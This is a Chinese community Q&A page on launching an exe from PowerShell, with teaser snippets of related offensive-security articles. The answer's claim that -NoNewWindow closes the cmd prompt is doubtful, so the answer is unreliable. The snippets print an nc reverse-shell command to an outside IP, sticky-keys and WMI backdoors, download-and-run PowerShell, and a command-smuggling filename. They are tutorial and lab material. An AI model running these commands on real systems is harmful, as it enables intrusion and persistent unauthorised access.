首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

在Powershell中运行exe并在执行exe后关闭cmd提示

,可以通过以下步骤实现:

  1. 打开Powershell终端:在Windows操作系统中,按下Win键+R,输入"powershell"并按下Enter键,即可打开Powershell终端。
  2. 切换到exe文件所在的目录:使用cd命令切换到包含exe文件的目录。例如,如果exe文件位于D盘的Test文件夹中,可以使用以下命令切换到该目录:cd D:\Test
  3. 运行exe文件:使用Start-Process命令运行exe文件。例如,如果要运行名为"example.exe"的文件,可以使用以下命令:Start-Process -FilePath .\example.exe其中,.\表示当前目录。
  4. 关闭cmd提示:为了在执行exe文件后关闭cmd提示,可以使用-NoNewWindow参数。修改上述命令如下:Start-Process -FilePath .\example.exe -NoNewWindow

这样,Powershell会在后台运行exe文件,并在执行完毕后关闭cmd提示。

注意:以上步骤中的"example.exe"仅为示例,实际使用时需要替换为相应的exe文件名。另外,Powershell中的命令可以根据具体需求进行进一步的扩展和优化。

页面内容是否对你有帮助?
有帮助
没帮助

相关·内容

cmd进入目录怎样运行exe_命令提示符怎样进入文件所在目录

如何用Windows命令提示符(cmd.exe)进入指定目录 一、Windows命令提示符是什么?...Windows 命令提示符(cmd.exe)是 Windows NT 及以后的 Windows 系统下的一个用于运行 Windows 控制面板程序或某些 DOS 程序的shell程序;或在 Windows...二、使用步骤 1.打开命令提示符 以Win10为例: 同时按下Win10电脑键盘上的“Win”+“R”组合按键,先打开Win10的运行程序。...(“Win”键“Ctrl”和“Alt”之间) 运行”程序窗口中,输入:cmd ——点击“确定”或者按键盘上的“Enter”键。然后就可以打开Win10的cmd命令提示符窗口。...进入如图: 2.进入指定目录 (1)先进入指定盘,盘符+”:”,不区分大小写(只有盘符不区分,其下的一级到多级目录需要区分大小写)如:进入E盘 (2)进入该盘的下一级目录:cd myjava

2.9K20

CMD的最佳“代替品”

如果讨厌CMD的命令操作那么就可以使用Linux命令行习惯,Windows操作 由此!...解压到本地磁盘~ image.png 运行Cmder.exe(第一次运行建议以“管理员身份”运行,方便初始化) image.png 如此初始化安装完成…… 当然,为了让Cmder完全代替cmd...,命令行头提示符是:"λ"而不是“$” 故此我们利用Cmder配置文件修改命令行头提示符 ~ cmder\vendor的clink.lua内做如下修改: image.png 如果不喜欢 $,也可以使用其它符号...Ctrl+Tab 切换页签 Alt+F4 关闭所有页签 Alt+Shift+1 开启cmd.exe Alt+Shift+2 开启powershell.exe Alt+Shift+3 开启...Alt+Shift+1 开启cmd.exe Alt+Shift+2 开启powershell.exe Alt+Shift+3 开启powershell.exe (系统管理员权限) Ctrl+1

1.7K20
  • psexec工具的使用

    psexec.exe依赖于admin共享,而impacket下的psexec.py则依赖于admin或c psexec的基本原理是:通过管道远程目标机器上创建一个psexec服务,并在本地磁盘中生成一个名为...然后,通过psexec服务运行命令,运行结束删除服务。 使用psexec执行远程命令时,会在目标系统创建一个psexec服务。命令执行,psexec服务将会被自动删除。...01 psexec使用前提 对方主机开启了 admin 共享,如果关闭了admin共享,会提示:找不到网络名 如果是工作组环境,则必须使用administrator用户连接,使用普通用户连接会提示:登录失败..../ psexec.exe \\192.168.10.131 -u xie\test -p x123456./ cmd 以域用户登录域成员主机 域成员主机:192.168.10.130 域普通用户:xie.../smb/psexec_psh :该模块生成的payload主要是由powershell实现的 显然powershell生成的payload免杀效果比exe的要好,但是windows xp、server2003

    9.2K20

    四十六.Powershell和PowerSploit脚本攻防万字详解

    一旦攻击者可以一台计算机上运行代码,就会下载PowerShell脚本文件(.ps1)到磁盘执行,甚至无须写到磁盘执行,它就可以直接在内存运行。...各Windows操作系统的PowerShell版本如下: 一旦攻击者一台计算机上运行代码,他们就会下载PowerShell脚本文件(.ps1)到磁盘执行,甚至无须写道磁盘执行,就可以直接在内存运行...(无文件攻击),也可以把PowerShell看作命令行提示cmd.exe的扩充。...最大的例外是,如果PowerShell脚本文件刚好位于你的系统目录,那么命令提示直接键入脚本文件名即可运行,如 ....经过测试,cmd窗口执行过程下载的PowerShell脚本,不论当前策略,都可以直接运行

    66010

    四十二.Powershell恶意代码检测系列 (3)PowerSploit脚本渗透详解

    一旦攻击者可以一台计算机上运行代码,就会下载PowerShell脚本文件(.ps1)到磁盘执行,甚至无须写到磁盘执行,它就可以直接在内存运行。...各Windows操作系统的PowerShell版本如下: 一旦攻击者一台计算机上运行代码,他们就会下载PowerShell脚本文件(.ps1)到磁盘执行,甚至无须写道磁盘执行,就可以直接在内存运行...(无文件攻击),也可以把PowerShell看作命令行提示cmd.exe的扩充。...最大的例外是,如果PowerShell脚本文件刚好位于你的系统目录,那么命令提示直接键入脚本文件名即可运行,如 ....经过测试,cmd窗口执行过程下载的PowerShell脚本,不论当前策略,都可以直接运行

    3.2K30

    看我一招鲜 | BAT转EXE快速生成

    可以看出在这个bat文件创建的指令可以cmd.exe依次顺序执行。 简单说下这些的意思,更加详细的内容可以查看bat文件的其他介绍。...不过powershell不仅可以windows系统运行,还可以再linux系统和MACOS上运行。...通过PowerShell编写完xxx.ps1的脚本文件,就可以通过FTViewSE命令向导中选择ScriptExecute去执行在FTVIEWSE脚本选项中保存的脚本即可执行这个脚本。...理论上讲powershell是比cmd更强大的语言,同时Powershell会兼容cmd的,但为啥powershell不行不是这个文章的重点,重点是如何能把这个.bat文件FTVIEW让他执行起来。...然后一路根据提示点到最后就可以创建包完成。 最后可以自己指定的存放的地方得到一个有微软公司生成的一个可执行exe文件。 最后再通过SE的选择命令去选择生成的可执行文件。

    4.7K30

    Impacket使用 - 起始点

    通过xp_cmdshell反弹shell 首先python临时起一个http服务,将nc或者是生成的木马放进去 目标xp_cmdshell输入**xp_cmdshell “powershell -c....exe” 使用powershell进入到当前用户的下载目录,使用wget命令下载木马文件 现在目标机器上有了nc,那么本地监听,再用xp_cmdshell执行即可 xp_cmdshell “powershell...\nc64.exe -e cmd.exe 10.10.14.50 333” 目标主机xp_cmdshell运行这条命令即可将cmd弹到攻击机 此时进入桌面可以看到有一个文件,看样子是flag 看到flag...下载好了之后执行将winPEAS运行起来,可以看到检测出有很多对应的cve提权方式 0x06....通过管理员历史命令登录超级用户 根据任务7的提示是找到特定程序输入的内容的历史记录,由此找到powershell的consolehost_history.txt 查看这个txt看到管理员之前用net.exe

    2.6K40

    针对黑客的Windows文件传输总结

    Invoke-PowerShellTcp.ps1') 从我们的Python日志,我们可以看到用户成功下载了脚本;我们的受害者上,我们看到提示执行立即挂起。...1.4从攻击者的HTTP服务器下载文件:cmd.exe 借助 PowerShell 示例,我们可以使用一种技术,它允许我们从 cmd.exe 提示执行 PowerShell 命令。...要从 cmd.exe 提示执行 PowerShell 命令,请使用“ powershell.exe -c ”启动该命令,后跟要执行PowerShell 命令,并用双引号引起来。...就像我们之前看到的那样,通过在上面的 PowerShell 命令前面添加powershell -c并将其用双引号引起来,我们可以从 cmd.exe 提示执行它: powershell.exe -c...从 cmd.exe 提示符使用 nc.exe 的语法与 PowerShell 提示的语法略有不同,因此我们将回顾两者。

    62111

    内网渗透基石篇——权限维持分析

    第三步:复制cmd.exe 复制一份cmd.exe文件,改名成sethc.exe,这样就大功告成了。...WMi型后门 WMI型后门只能由具有管理员权限的用户运行。WMI型后门通常是用PowerShell扫描的可以直接从新的WMI属性读取和执行后门代码、给代码能。...其基本原理是:将代码存储存储于WMI,达到要求的“无文件”;当设定的条件被满足时,系统将自动启动PowerShell进程去后门程序,执行,进程将消失(持续根据后门的运行情况而定时间,一般是几秒)。...其基本原理为:将代码加密存储于WMI,实现无文件;当设定的条件被满足时,系统将自动启动PowerShell进程去执行后门程序,执行,进程将会消失,实现无进程。...3.验证环境 进入目标机器上,验证wmi powershell中直接输入下面的命令 结果可以看到 CommandLineTemlate的内容包含 powershell.exe Get-WMIObject

    1.4K20

    通过计划任务实现持续性攻击

    Windows操作系统中提供了一个实用工具schtasks.exe,系统管理可以使用该工具完成指定日期和时间执行程序或脚本的工作。但是目前这个工具经常被黑客或者红队利用,从而实现持续性攻击。...图*-* 命令提示实现的计划任务 当系统用户再次登录时,系统将下载执行Payload并建立Meterpreter会话。 ?...Windows的事件(event)命令行可以查询事件(event)的ID。 ? 我们可以创建一个关联特定事件的计划任务(下载执行某个payload)。 ?...图*-* 查询调度任务 当目标系统的用户管理员注销时,将创建事件ID,并在下次登录时执行payload。 ?...图*-* 使用SharPersist列出的计划任务信息 与Metasploit框架功能类似,SharPersist也具有检查目标是否易受攻击的功能,SharPersist提供了一个运行检查,这个功能可用于通过检查名称和提供的参数来验证计划任务

    1.1K30

    粘滞键项权限维持

    粘滞键项 window Vista以上的操作系统,修改sethc会提示需要trustedinstaller权限,trustedinstaller是一个安全机制,即系统的最高权限,权限比administrator...之后window下执行以下命令: cd c:\windows\system32 move sethc.exe sethc.exe.bak //备份sethc.exe copy cmd.exe sethc.exe...同时,当我们权限维持时,如果留下了粘滞键后门,当用户修改密码,我们远程连接时可能会出现无法登录的情况,这时候上面这种后门进行权限维持就比较有用了: 第一种:创建cmd.exe粘滞键,之后登录界面按下...之后目标主机连续五次shift即可执行SYSTEM权限的命令行,这在RDP远程登录用户密码已被修改的情况下很有用~ ?...之后目标主机上按5次shift即可触发后门代理(中间会有一个弹窗迅速闪过,用于执行命令,笔者也未捕获到) ? 之后empire成功反弹后门代理: ?

    1.3K20

    【蓝队福利】D-eyes木马查杀与微步的一次巧妙结合

    powershell执行"....\D-Eyes.exe -h"查看工具所有参数说明(使用powershell执行工具程序,得到的回显结果会比cmd更完整或重定向输出到txt) ....,会在终端进行提示扫描时我们可以使用默认的扫描探测,例如:Windows平台中我们直接执行如下命令会默认去扫描"C://" D-Eyes.exe fs 我们也可以制定特定的目录去扫描,例如: D-Eyes.exe...fs -P C:\Windows\TEMP,D:\tmp -t 3 进程扫描 我们可以使用D-eyes进行进程扫描,扫描的结果在终端上提示,我们可以执行以下命令进行全部的进程扫描: D-Eyes.exe...ps 最后会给出扫描整理的结果: 计划任务 通过执行以下命令获取计划任务信息: D-Eyes.exe task 自启动类 通过执行以下命令扫描检测自启动项: D-Eyes.exe autoruns

    20210

    windows系统安全|Windows渗透基础大全

    ) Windows中加载并执行PowerShell脚本 本地加载并执行PowerShell脚本 远程下载并执行PowerShell脚本 Windows的批处理文件 Windows快捷键操作 Windows...所以建议执行前,先进入powershell下 iwr -Uri http://www.test.com/vps.exe -OutFile vps.exe -UseBasicParsing Windows...更多的关于PowerShell的用法:PowerShell使用浅析 本地加载并执行PowerShell脚本 cmd当前目录下有PowerView.ps1脚本,并执行其中的Get-Netdomain模块...\powerview.ps1;Get-NetDomain Windows的批处理文件 @echo off 表示在此语句所有运行的命令都不显示命令行本身 echo...,该进程的正常运行能够确保桌面上显示桌面图标和任务栏 lsass.exe:该进行用于windows操作系统的安全机制、本地安全和登录策略 services.exe:该进程用于启动和停止系统的服务,如果用户手动终止该进程

    1.8K10

    Windows维权之粘滞键项维权

    window Vista以上的操作系统修改sethc会提示需要trustedinstaller权限,trustedinstaller是一个安全机制,即系统的最高权限,权限比administrator管理员高...之后连续按下5次"Shift"键,之后将弹出命令执行窗口,可以直接以System权限执行系统命令、创建管理员用户、登录服务等同时,当我们权限维持时,如果留下了粘滞键后门,当用户修改密码,我们远程连接时可能会出现无法登录的情况...,这时候上面这种后门进行权限维持就比较有用了:第一种:创建cmd.exe粘滞键,之后登录界面按下5次shift调用cmd来添加用户,之后再次登录:第二种:使用后门文件shell.exe来替换sethc.exe...use post/windows/manage/sticky_keysset SESSION 8exploit之后目标主机连续五次shift即可执行SYSTEM权限的命令行,这在RDP远程登录用户密码已被修改的情况下很有用...(放大镜Win + U启动再选择)之后目标主机上按5次shift即可触发后门代理(中间会有一个弹窗迅速闪过,用于执行命令,笔者也未捕获到)之后empire成功反弹后门代理:Powershell粘性键持久性技术是众所周知的

    34910

    091031 T PowerShell Solution

    powershell有一个星期了吧,一直为这种批处理的运行模式烦恼。按照以下步骤操作的效果是:     直接.ps1文件可以以管理员身份使用powershell.exe运行代码。    ...由于默认的ps1文件的右键命令Run with powershell不是以管理员身份运行,所以很多命令都会执行失败。...而powershell.execmd.exe等进程是OS自带的,不能设置默认以管理员运行。所以这里创建一个新的exe,代理到powershell.exe。然后再设置此程序默认以管理员运行即可。...                    p.StartInfo.Arguments = string.Format("-NoExit -File \"{0}\"", fileName);//如果需要在执行完毕关闭...(此步骤为未开启UAC的系统使用)运行cmd命令关联默认的.ps1文件程序为PowerShell.exe

    80860

    精心构造的PS1文件名导致Powershell命令执行

    我们一次测试偶然发现,由于信任未过滤的文件名,因此在运行特殊命名的脚本时,PowerShell可能会执行任意代码。...测试发现运行带有特殊格式文件名的脚本,可以导致执行其他木马如exe文件,也可以是任何可执行文件如.com,.exe,.bat,.cpl,.js,.vbs和.wsf。 例如:使用”....\calc;1.ps1”则可以用来执行calc.exe,如果使用标准调用了该脚本Windows外壳程序“ cmd.exe”和“ calc.exe”与ps1脚本位于同一目录。如下图所示: ?...默认情况下 然后从cmd.exe运行脚本,例如: c:\>powershell "\Hello;World.ps1" 也可以直接运行,而无需放入PowerShell shell。...测试过程如下: 1、生成powershell命令:首先,我们创建一个用于混淆的Base64编码的文件名;它将下载并执行一个本例名为“ calc.exe”的远程可执行文件。

    1.9K20

    内网学习笔记 | 2、PowerShell

    1、介绍 PowerShell 可以简单的理解为 cmd 的高级版,cmd 能做的事 PowerShell 中都能做,但 PowerShell 还能做很多 cmd 不能做的事情。...PowerShell 有如下特点: Windows 7 以上的操作系统默认安装 PowerShell 脚本可以运行在内存,不需要写入磁盘 可以从另一个系统中下载 PowerShell 脚本并执行 目前很多工具都是基于...执行策略 为了防止恶意脚本 PowerShell 中被运行PowerShell 有个执行策略,默认情况下,这个执行策略是受限模式Restricted。...\aps1,最大的例外是,如果 PowerShell 脚本文件刚好位于你的系统目录,那么你可以直接在命令提示符命令提示键入脚本文件名即可运行” 这里的“系统目录”是指的啥目录?.../master/ps_encoder.py 下载好,需要先将要执行的命令保存到文本文件,这里保存到了 tmp.txt 文本,之后执行 python ps_encoder.py -s tmp.txt

    1.4K20

    渗透测试与开发技巧

    同名exe和com文件执行顺序 如果一个路径下同时包含同名的exe和com文件,例如test.exe和test.com,通过命令行cmd输入test(不包含文件后缀名),会优先运行com文件,即test.com...Windows下cpl文件介绍 本质上是DLL文件,后缀名为cpl,包含一个导出函数CPLApplet(c实现可不指定) 执行方法: (1)双击直接运行 (2)cmd rundll32 shell32....位系统下运行需要注意的重定向问题》 ---- Tips 16....快捷方式的参数隐藏技巧 将payload放置260个空字符之后,这样无法文件属性查看payload,可以用来快捷方式隐藏payload,欺骗用户点击,隐蔽执行代码 参考: 《渗透技巧——快捷方式文件的参数隐藏技巧...) 参考: 《渗透技巧——"隐藏"注册表的创建》 《渗透技巧——"隐藏"注册表的更多测试》 方法19:powershell配置文件 修改powershell配置文件,后门powershell进程启动触发

    4.5K20
    领券